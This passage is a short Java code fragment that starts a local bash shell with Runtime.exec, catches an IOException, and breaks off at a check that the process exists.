try { proc = Runtime.getRuntime().exec("/bin/bash"); } catch (IOException e) { e.printStackTrace(); } if (proc != null) {